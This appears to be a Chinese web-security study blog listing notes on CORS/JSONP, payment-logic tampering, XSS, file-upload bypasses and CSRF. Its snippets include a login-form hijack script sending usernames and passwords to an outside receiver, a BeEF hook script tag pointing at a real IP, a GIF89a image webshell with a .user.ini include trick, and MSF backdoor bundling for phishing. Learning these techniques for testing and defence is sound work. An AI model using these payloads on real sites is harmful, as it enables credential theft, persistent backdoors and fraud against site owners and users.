通用漏洞-跨域 & CORS 资源 & JSONP跨域回调
通用漏洞-跨域 & CORS 资源 & JSONP跨域回调同源策略(sop) 同源包括三个条件:同协议,同域名,同端口浏览器安全策略限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用于隔离潜在恶意文件的关键的安全机制虽然同源策略在安全方面起到了很好的防护作用,但是也在一定程度上限制了一些前端功能的实现所以就有了许多跨域的手段。
CORS跨域资源共享–突破同源策略是HTML5的新特性,是 放宽同源策略 的机制,它允许浏览器向跨源服务器,发出xmlhttprequest请求,从而克服了Ajax智能同源使用的限制使不同的网站可以跨域获取数据
CORS漏洞资源共享 – CSRF同源策略失败无效获取到你的资源用户A 登录自己的后台页面后–》访问了第三方页面–》第三方页面去请求后台或者页面内容–》用户A访问了页面同时将自己的页面内容泄露出去
jsonp支付接口登录接口等调用第三方接口时,不是同源,怎么办,不符合同源策略
所以会设置白名单进行cors资源跨域共享Access-Control-Allow-Origin:* 表示其他页面能搞获取此页面的资源
如何判断?看 ...
通用漏洞-购买支付逻辑 & 数据篡改
通用漏洞-购买支付逻辑 & 数据篡改篡改购买价格、购买数量、支付方式、订单号、支付状态替换支付、重复支付、最小额支付、负数支付、溢出支付、优惠券支付
1、产品覆盖
-用低价该高价的商品,对比两个数据包,对信息进行修改除了价格,其他信息改成高价商品的信息,post请求中的数据
2、支付接口修改-信息替换
抓包没有商品价格,可以修改数量
没有数量咋办?
没办法,想其他思路 – 优惠券3、使用优惠券和不时有优惠券抓包找不同
找到使用优惠券的数据包特征修改优惠券数据
使用优惠券薅羊毛修复-优惠券-数据特征不明显,加密字段
4、订单覆盖
-用一个的订单覆盖10000的订单
抓包找到get请求头,用一个的去购买1000000的,覆盖数据包头
http://guarantee1.qilecms.com/
直接抓包修改
漏洞修复 & 代码审计1、金额以数据库为准-不然呢就可以进行篡改了(前提是数据库信息安全,没有被篡改哦)2、购买数量限制为正整数(不能为负数或者小数哦)
XSS-3
XSS(跨站脚本攻击)Cross-Site Scripting利用攻击:–条件:已经取得web权限一、XSS-后台植入Cookie表单劫持1、写入代码到登陆成功文件,利用beef或xss平台实时监控cookie等凭据实现权限维持2、若存在同源策略或防护情况下,cookie获取失败可采用表单劫持或数据明文传输实现
(后台植入)—–对后台长期控制:在取得web权限后,插入恶意代码在index.php中每次登录成功,获取cookie登录抓包直接修改cookie
《1》cookie劫持无效,可以简单表单劫持==》1、在登录页面写入监听劫持代码
$up=’<script src = http://xxxxx/get.php?user='xxx'&pass='xxx'>echo $up;《2》==》2、接收地址中写入接收文件
二、xss-flash 钓鱼配合 MSF捆绑上线
==》针对个人客户端1、msf生成后门文件2、下载官方文件3、捆绑压缩,高级自定义,解压前运行 ...
XSS-2
——— 鲁迅曾经说过,乱点链接的人就该中马。
XSS(跨站脚本攻击)Cross-Site ScriptingXSS原理:接收输入数据接收后输出数据将接收到的数据进行页面显示,数据一旦是js代码,将会被调用执行实现XSS攻击对人(管理员,站长)的攻击——-xss攻击
分类:1、反射型:(非持久型)恶意链接拼接语句—-一次性2、存储型:(持久型)—-持久
3、 DOM xss(接收输出均在js实现,后期构造在HTML页面)修改页面DOM节点行成xssdocument.
beef-xss搭建钓鱼服务器加载<script src="http://47.94.236.117:3000/hook.js"><script>
=cookie获取跳转指向社工钓鱼配合漏洞
帝国cms网站:url=javascript:alert(1)fofa.info搜“Empirecms”
============== ...
文件上传-02
文件上传漏洞(图片马)文件头pngGIF89a
1、先想办法上传带后门的文件xxxxxx中有远程连接木马的代码(地址)
GIF89a<?=include’http://794750069/'>2、在上传 .user.ini 文件使全局包括 xxx文件auto_prepend_file=xxx
访问:
1、图片二次渲染过滤图片中的恶意代码
可以对比渲染前后二进制代码找出共同部分在此插入后门会有文件检测程序很大几率不成功
二次渲染过的成功上传的图片进行二进制脚本注入恶意代码
2、过滤字符组合
总结步骤:1、查看前端是否有验证有验证直接修改没有验证直接抓包
2、抓到包修改Content-Disposition filename = ‘xxx.php’Content-Type: image/png
内容:xxxxxxxxxxxxxx(可插入后门代码)
如果直接上传成功,则直接利用
3、有内容字符过滤
转换后门代码格式
图片中内容字符中可以插入后门代码
图片有二次渲染则保存二次渲染的图片
在二次渲染的图片中插入后门代码
突破 ...
CSRF-1
CSRFCSRF(跨站请求伪造)原理&后台自动添加管理员
条件:1、目标用户已经登陆的网站,能执行网站的功能2、目标用户访问了攻击者构造的URL
探针与防御1、验证来源2、看凭据有无token3、看关键操作有无验证
流程1、获取目标的触发数据包2、利用CSRFTester构造导出3、诱使受害者访问特定地址触发
黑盒如何判断:防护,只有自己网站请求的数据包才可以响应,不是本站的拒绝响应
1、直接在站点访问站内的一个跳转链接复制地址直接请求访问如果可以访问到则存在CSRF跨站请求伪造没有同源访问限制2、看数据包中有没有token前后端对比token–随机产生有则无法进行csrf跨站请求伪造